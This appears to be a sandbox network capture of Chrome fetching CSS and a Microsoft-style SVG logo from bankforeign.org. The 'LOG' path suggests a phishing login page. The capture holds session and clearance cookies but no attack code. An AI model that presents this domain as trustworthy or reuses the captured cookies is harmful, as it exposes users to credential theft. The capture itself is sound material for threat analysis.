                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            38192.168.2.449781104.21.73.884433260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:38:47 UTC1201OUTGET /APP-a8fa5b4494ce08322db1f933d9e75f5e65bc01571cb6e/a8fa5b4494ce08322db1f933d9e75f5e65bc01571cb6f HTTP/1.1
                                                            Host: bankforeign.org
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-arch: "x86"
                                                            sec-ch-ua-full-version: "117.0.5938.132"
                                                            sec-ch-ua-platform-version: "10.0.0"
                                                            sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                            sec-ch-ua-bitness: "64"
                                                            sec-ch-ua-model: ""
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: text/css,*/*;q=0.1
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: style
                                                            Referer: https://bankforeign.org/21663221c08095a4839b4833d7029a6265bc0151070e0LOG21663221c08095a4839b4833d7029a6265bc0151070e1
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: cf_clearance=ZahAkzH78SuBc7fffZ83DZgUgeOUbPvgZ1MmYVWhTks-1706819889-1-AYl4hgE08Tq31T7qgAmdGceKllzYl4V7CCS75b35xf1ftm/G3nMz2igf9z04EetHW3fpVQ74BPZjSO7eYJEv0v0=; PHPSESSID=3d73224af4a5074ab3f0a1a28dbb1ba7
                                                            2024-02-01 20:38:48 UTC630INHTTP/1.1 200 OK
                                                            Date: Thu, 01 Feb 2024 20:38:48 GMT
                                                            Content-Type: text/css
                                                            Content-Length: 105369
                                                            Connection: close
                                                            Last-Modified: Thu, 01 Feb 2024 18:12:11 GMT
                                                            Accept-Ranges: bytes
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nyEnbLOMgkH30LR%2FOwWGYw8cuDI3%2BeDwWNVw%2FamC%2FkkNfj8nk%2Ft3ccthM2yzTOHzyn0%2BFOE5DmH1%2BWQGFwwBimHTHlH01Ba3aKY0jwqk8wVfhhgxWfIgZnfGoMfO5yPtJ4w%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 84ed0005397b070b-ATL
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-02-01 20:38:48 UTC739INData Raw: 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 7d 61 72 74 69 63 6c 65 2c 61 73 69 64 65 2c 64 65 74 61 69 6c 73 2c 66 69 67 63 61 70 74 69 6f 6e 2c 66 69 67 75 72 65 2c 66 6f 6f 74 65 72 2c 68 65 61 64 65 72 2c 68 67 72 6f 75 70 2c 6d 61 69 6e 2c 6d 65 6e 75 2c 6e 61 76 2c 73 65 63 74 69 6f 6e 2c 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 61 75 64 69 6f 2c 63 61 6e 76 61 73 2c 70 72 6f 67 72 65 73 73 2c 76 69 64 65 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 76 65 72
                                                            Data Ascii: html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;ver
                                                            2024-02-01 20:38:48 UTC1369INData Raw: 65 7b 6d 61 72 67 69 6e 3a 31 65 6d 20 34 30 70 78 7d 68 72 7b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 68 65 69 67 68 74 3a 30 7d 70 72 65 7b 6f 76 65 72 66 6c 6f 77 3a 61 75 74 6f 7d 63 6f 64 65 2c 6b 62 64 2c 70 72 65 2c 73 61 6d 70 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6d 6f 6e 6f 73 70 61 63 65 2c 6d 6f 6e 6f 73 70 61 63 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 3a 69 6e 68 65 72 69 74 3b 6d 61 72 67 69 6e 3a 30 7d 62 75 74 74 6f 6e 7b 6f 76 65 72 66 6c 6f 77 3a 76 69
                                                            Data Ascii: e{margin:1em 40px}hr{-moz-box-sizing:content-box;box-sizing:content-box;height:0}pre{overflow:auto}code,kbd,pre,samp{font-family:monospace,monospace;font-size:1em}button,input,optgroup,select,textarea{color:inherit;font:inherit;margin:0}button{overflow:vi
                                                            2024-02-01 20:38:48 UTC1369INData Raw: 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 69 6e 70 75 74 2c 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 61 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 74 68 69 6e 20 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 2d 6f 66 66 73 65 74 3a 2d 32 70 78 3b 6f 75 74 6c 69 6e 65 3a 35 70 78 20 61 75 74 6f 20 2d 77 65 62 6b 69 74 2d 66 6f 63 75 73 2d 72 69 6e 67 2d 63 6f 6c 6f 72 7d 66 69 67 75 72 65 7b 6d 61 72 67 69 6e 3a 30 7d 69 6d 67 7b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 2e 69 6d 67 2d 72 65 73 70 6f 6e 73 69 76 65 7b 64 69 73 70 6c
                                                            Data Ascii: ing:border-box}input,button,select,textarea{font-family:inherit;font-size:inherit;line-height:inherit}a:focus{outline:thin dotted;outline-offset:-2px;outline:5px auto -webkit-focus-ring-color}figure{margin:0}img{vertical-align:middle}.img-responsive{displ
                                                            2024-02-01 20:38:48 UTC1369INData Raw: 65 78 74 2d 63 65 6e 74 65 72 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 74 65 78 74 2d 6a 75 73 74 69 66 79 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 6a 75 73 74 69 66 79 7d 2e 74 65 78 74 2d 6e 6f 77 72 61 70 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 74 65 78 74 2d 6c 6f 77 65 72 63 61 73 65 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6c 6f 77 65 72 63 61 73 65 7d 2e 74 65 78 74 2d 75 70 70 65 72 63 61 73 65 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 7d 2e 74 65 78 74 2d 63 61 70 69 74 61 6c 69 7a 65 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 63 61 70 69 74 61 6c 69 7a 65 7d 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70
                                                            Data Ascii: ext-center{text-align:center}.text-justify{text-align:justify}.text-nowrap{white-space:nowrap}.text-lowercase{text-transform:lowercase}.text-uppercase{text-transform:uppercase}.text-capitalize{text-transform:capitalize}ul,ol{margin-top:0;margin-bottom:10p
                                                            2024-02-01 20:38:48 UTC1369INData Raw: 61 78 2d 68 65 69 67 68 74 3a 31 36 34 2e 35 34 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 30 2e 32 38 33 39 35 72 65 6d 7d 2e 74 65 78 74 2d 68 65 61 64 6c 69 6e 65 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 33 7b 6d 61 78 2d 68 65 69 67 68 74 3a 32 34 34 2e 35 34 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 35 2e 32 38 33 39 35 72 65 6d 7d 2e 74 65 78 74 2d 68 65 61 64 6c 69 6e 65 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 34 7b 6d 61 78 2d 68 65 69 67 68 74 3a 33 32 34 2e 35 34 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 32 30 2e 32 38 33 39 35 72 65 6d 7d 2e 74 65 78 74 2d 68 65 61 64 65 72 2c 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 36 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 35 36 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74
                                                            Data Ascii: ax-height:164.5432px;max-height:10.28395rem}.text-headline.text-maxlines-3{max-height:244.5432px;max-height:15.28395rem}.text-headline.text-maxlines-4{max-height:324.5432px;max-height:20.28395rem}.text-header,h1{font-size:46px;line-height:56px;font-weight
                                                            2024-02-01 20:38:48 UTC1369INData Raw: 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 37 35 72 65 6d 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 2e 33 36 33 32 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32 2e 33 36 33 32 70 78 7d 2e 74 65 78 74 2d 74 69 74 6c 65 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 31 2c 68 33 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 31 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c 6c 69 70 73 69 73 3b 6d 61 78 2d 68 65 69 67 68 74 3a 33 32 2e 37 32 36 34 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 32 2e 30 34 35 34 72 65 6d 7d 2e 74 65 78 74 2d 74 69 74 6c 65 2e 74 65 78 74 2d 6d 61 78 6c 69 6e
                                                            Data Ascii: px;font-weight:300;font-size:1.5rem;line-height:1.75rem;padding-bottom:2.3632px;padding-top:2.3632px}.text-title.text-maxlines-1,h3.text-maxlines-1{white-space:nowrap;text-overflow:ellipsis;max-height:32.7264px;max-height:2.0454rem}.text-title.text-maxlin
                                                            2024-02-01 20:38:48 UTC1369INData Raw: 2d 6d 61 78 6c 69 6e 65 73 2d 32 7b 6d 61 78 2d 68 65 69 67 68 74 3a 33 30 2e 33 36 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 2e 38 39 37 37 72 65 6d 7d 2e 74 65 78 74 2d 63 61 70 74 69 6f 6e 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 33 2c 68 35 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 33 7b 6d 61 78 2d 68 65 69 67 68 74 3a 34 34 2e 33 36 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 32 2e 37 37 32 37 72 65 6d 7d 2e 74 65 78 74 2d 63 61 70 74 69 6f 6e 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 34 2c 68 35 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 34 7b 6d 61 78 2d 68 65 69 67 68 74 3a 35 38 2e 33 36 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 33 2e 36 34 37 37 72 65 6d 7d 2e 74 65 78 74 2d 63 61 70 74 69 6f 6e 2d 61 6c 74 2c 68
                                                            Data Ascii: -maxlines-2{max-height:30.3632px;max-height:1.8977rem}.text-caption.text-maxlines-3,h5.text-maxlines-3{max-height:44.3632px;max-height:2.7727rem}.text-caption.text-maxlines-4,h5.text-maxlines-4{max-height:58.3632px;max-height:3.6477rem}.text-caption-alt,h
                                                            2024-02-01 20:38:48 UTC1107INData Raw: 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 35 72 65 6d 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 2e 32 32 37 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 2e 32 32 37 70 78 7d 2e 74 65 78 74 2d 62 6f 64 79 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 31 2c 70 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 31 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c 6c 69 70 73 69 73 3b 6d 61 78 2d 68 65 69 67 68 74 3a 32 30 2e 34 35 34 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 2e 32 37 38 33 38 72 65 6d 7d 2e 74 65 78 74 2d 62 6f 64 79 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 32 2c 70 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 32 7b 6d 61 78 2d 68 65 69 67 68 74 3a 34 30 2e 34 35 34 70 78 3b 6d
                                                            Data Ascii: ine-height:1.25rem;padding-bottom:.227px;padding-top:.227px}.text-body.text-maxlines-1,p.text-maxlines-1{white-space:nowrap;text-overflow:ellipsis;max-height:20.454px;max-height:1.27838rem}.text-body.text-maxlines-2,p.text-maxlines-2{max-height:40.454px;m
                                                            2024-02-01 20:38:48 UTC1369INData Raw: 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 30 70 78 7d 75 6c 20 6c 69 2c 6f 6c 20 6c 69 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 32 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 32 70 78 7d 2e 6c 69 73 74 2d 69 6e 6c 69 6e 65 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 70 78 7d 2e 6c 69 73 74 2d 69 6e 6c 69 6e 65 3e 6c 69 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 34 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 34 70 78 7d 62 6c 6f 63 6b 71 75 6f 74 65 7b 70 61 64 64 69 6e 67 3a 38 70 78 20 31 32 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 32 70 78 7d 2e 62 6c 6f 63 6b 71 75 6f 74 65 2d 72
                                                            Data Ascii: argin-bottom:20px}ul li,ol li{margin-top:12px;margin-bottom:12px}.list-inline{padding-left:0;list-style:none;margin-left:-4px}.list-inline>li{display:inline-block;padding-left:4px;padding-right:4px}blockquote{padding:8px 12px;margin:0 0 12px}.blockquote-r
                                                            2024-02-01 20:38:48 UTC1369INData Raw: 2c 2e 63 6f 6c 2d 6c 67 2d 31 34 2c 2e 63 6f 6c 2d 78 73 2d 31 35 2c 2e 63 6f 6c 2d 73 6d 2d 31 35 2c 2e 63 6f 6c 2d 6d 64 2d 31 35 2c 2e 63 6f 6c 2d 6c 67 2d 31 35 2c 2e 63 6f 6c 2d 78 73 2d 31 36 2c 2e 63 6f 6c 2d 73 6d 2d 31 36 2c 2e 63 6f 6c 2d 6d 64 2d 31 36 2c 2e 63 6f 6c 2d 6c 67 2d 31 36 2c 2e 63 6f 6c 2d 78 73 2d 31 37 2c 2e 63 6f 6c 2d 73 6d 2d 31 37 2c 2e 63 6f 6c 2d 6d 64 2d 31 37 2c 2e 63 6f 6c 2d 6c 67 2d 31 37 2c 2e 63 6f 6c 2d 78 73 2d 31 38 2c 2e 63 6f 6c 2d 73 6d 2d 31 38 2c 2e 63 6f 6c 2d 6d 64 2d 31 38 2c 2e 63 6f 6c 2d 6c 67 2d 31 38 2c 2e 63 6f 6c 2d 78 73 2d 31 39 2c 2e 63 6f 6c 2d 73 6d 2d 31 39 2c 2e 63 6f 6c 2d 6d 64 2d 31 39 2c 2e 63 6f 6c 2d 6c 67 2d 31 39 2c 2e 63 6f 6c 2d 78 73 2d 32 30 2c 2e 63 6f 6c 2d 73 6d 2d 32 30 2c 2e
                                                            Data Ascii: ,.col-lg-14,.col-xs-15,.col-sm-15,.col-md-15,.col-lg-15,.col-xs-16,.col-sm-16,.col-md-16,.col-lg-16,.col-xs-17,.col-sm-17,.col-md-17,.col-lg-17,.col-xs-18,.col-sm-18,.col-md-18,.col-lg-18,.col-xs-19,.col-sm-19,.col-md-19,.col-lg-19,.col-xs-20,.col-sm-20,.


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            39192.168.2.449780104.21.73.884433260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:38:47 UTC1199OUTGET /o/a8fa5b4494ce08322db1f933d9e75f5e65bc01571cb9d HTTP/1.1
                                                            Host: bankforeign.org
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-arch: "x86"
                                                            sec-ch-ua-full-version: "117.0.5938.132"
                                                            sec-ch-ua-platform-version: "10.0.0"
                                                            sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                            sec-ch-ua-bitness: "64"
                                                            sec-ch-ua-model: ""
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://bankforeign.org/21663221c08095a4839b4833d7029a6265bc0151070e0LOG21663221c08095a4839b4833d7029a6265bc0151070e1
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: cf_clearance=ZahAkzH78SuBc7fffZ83DZgUgeOUbPvgZ1MmYVWhTks-1706819889-1-AYl4hgE08Tq31T7qgAmdGceKllzYl4V7CCS75b35xf1ftm/G3nMz2igf9z04EetHW3fpVQ74BPZjSO7eYJEv0v0=; PHPSESSID=3d73224af4a5074ab3f0a1a28dbb1ba7
                                                            2024-02-01 20:38:48 UTC640INHTTP/1.1 200 OK
                                                            Date: Thu, 01 Feb 2024 20:38:48 GMT
                                                            Content-Type: image/svg+xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Last-Modified: Thu, 01 Feb 2024 18:12:11 GMT
                                                            Vary: Accept-Encoding
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DsfDmj2xLgT2QSk7GCHhBycpe7NI9qmpJ1qqqCWMRgpK%2B%2BuDqdWYzN8%2BF%2FbEYL6ZpHozk%2FbcVofxuc%2BuqltJ%2BofiFkuJZrBgAjGCmNg9wzF7zkfu24kKsZwqbqDKao5027Q%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 84ed00053b92675b-ATL
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-02-01 20:38:48 UTC729INData Raw: 65 34 33 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e
                                                            Data Ascii: e43<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.
                                                            2024-02-01 20:38:48 UTC1369INData Raw: 34 33 31 2c 34 2e 34 33 31 2c 30 2c 30 2c 31 2c 31 2e 30 36 33 2e 33 39 76 32 2e 32 33 33 61 34 2e 37 36 33 2c 34 2e 37 36 33 2c 30 2c 30 2c 30 2d 31 2e 31 2d 2e 36 31 31 2c 33 2e 31 38 34 2c 33 2e 31 38 34 2c 30 2c 30 2c 30 2d 31 2e 31 35 2d 2e 32 31 37 2c 32 2e 39 31 39 2c 32 2e 39 31 39 2c 30 2c 30 2c 30 2d 32 2e 32 32 33 2e 39 2c 33 2e 33 37 2c 33 2e 33 37 2c 30 2c 30 2c 30 2d 2e 38 34 37 2c 32 2e 34 31 36 2c 33 2e 32 31 36 2c 33 2e 32 31 36 2c 30 2c 30 2c 30 2c 2e 38 31 33 2c 32 2e 33 33 38 2c 32 2e 39 33 36 2c 32 2e 39 33 36 2c 30 2c 30 2c 30 2c 32 2e 32 30 39 2e 38 33 37 4d 36 35 2e 34 2c 38 2e 33 34 33 61 32 2e 39 35 32 2c 32 2e 39 35 32 2c 30 2c 30 2c 31 2c 2e 35 2e 30 33 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 2e 33 37 35 2e 31 76 32 2e
                                                            Data Ascii: 431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.
                                                            2024-02-01 20:38:48 UTC1369INData Raw: 35 33 39 2d 31 2e 37 31 33 2c 32 2e 37 30 36 2c 32 2e 37 30 36 2c 30 2c 30 2c 31 2c 31 2e 30 36 33 2d 32 2e 32 41 34 2e 32 34 33 2c 34 2e 32 34 33 2c 30 2c 30 2c 31 2c 38 31 2e 35 2c 38 2e 32 35 36 61 36 2e 36 36 33 2c 36 2e 36 36 33 2c 30 2c 30 2c 31 2c 31 2e 31 36 34 2e 31 31 35 2c 35 2e 31 36 31 2c 35 2e 31 36 31 2c 30 2c 30 2c 31 2c 31 2e 30 37 38 2e 33 76 32 2e 32 31 34 61 34 2e 39 37 34 2c 34 2e 39 37 34 2c 30 2c 30 2c 30 2d 31 2e 30 37 38 2d 2e 35 32 39 2c 33 2e 36 2c 33 2e 36 2c 30 2c 30 2c 30 2d 31 2e 32 32 32 2d 2e 32 32 31 2c 31 2e 37 38 31 2c 31 2e 37 38 31 2c 30 2c 30 2c 30 2d 31 2e 30 33 34 2e 32 36 2e 38 32 34 2e 38 32 34 2c 30 2c 30 2c 30 2d 2e 33 37 31 2e 37 31 32 4d 38 35 2e 32 37 38 2c 31 33 2e 36 41 35 2e 33 35 38 2c 35 2e 33 35 38 2c
                                                            Data Ascii: 539-1.713,2.706,2.706,0,0,1,1.063-2.2A4.243,4.243,0,0,1,81.5,8.256a6.663,6.663,0,0,1,1.164.115,5.161,5.161,0,0,1,1.078.3v2.214a4.974,4.974,0,0,0-1.078-.529,3.6,3.6,0,0,0-1.222-.221,1.781,1.781,0,0,0-1.034.26.824.824,0,0,0-.371.712M85.278,13.6A5.358,5.358,
                                                            2024-02-01 20:38:48 UTC191INData Raw: 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 37 66 62 61 30 30 22 2f 3e 3c 72 65 63 74 20 79 3d 22 31 32 2e 30 36 39 22 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 30 30 61 34 65 66 22 2f 3e 3c 72 65 63 74 20 78 3d 22 31 32 2e 30 36 39 22 20 79 3d 22 31 32 2e 30 36 39 22 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 66 66 62 39 30 30 22 2f 3e 3c 2f 73 76 67 3e 0d 0a
                                                            Data Ascii: th="10.931" height="10.931" fill="#7fba00"/><rect y="12.069" width="10.931" height="10.931" fill="#00a4ef"/><rect x="12.069" y="12.069" width="10.931" height="10.931" fill="#ffb900"/></svg>
                                                            2024-02-01 20:38:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            40192.168.2.449782104.21.73.884433260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:38:47 UTC1169OUTGET /ASSETS/img/m_.svg HTTP/1.1
                                                            Host: bankforeign.org
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-arch: "x86"
                                                            sec-ch-ua-full-version: "117.0.5938.132"
                                                            sec-ch-ua-platform-version: "10.0.0"
                                                            sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                            sec-ch-ua-bitness: "64"
                                                            sec-ch-ua-model: ""
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://bankforeign.org/21663221c08095a4839b4833d7029a6265bc0151070e0LOG21663221c08095a4839b4833d7029a6265bc0151070e1
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: cf_clearance=ZahAkzH78SuBc7fffZ83DZgUgeOUbPvgZ1MmYVWhTks-1706819889-1-AYl4hgE08Tq31T7qgAmdGceKllzYl4V7CCS75b35xf1ftm/G3nMz2igf9z04EetHW3fpVQ74BPZjSO7eYJEv0v0=; PHPSESSID=3d73224af4a5074ab3f0a1a28dbb1ba7
                                                            2024-02-01 20:38:48 UTC663INHTTP/1.1 200 OK
                                                            Date: Thu, 01 Feb 2024 20:38:48 GMT
                                                            Content-Type: image/svg+xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Last-Modified: Thu, 01 Feb 2024 18:12:11 GMT
                                                            Vary: Accept-Encoding
                                                            Cache-Control: max-age=14400
                                                            CF-Cache-Status: MISS
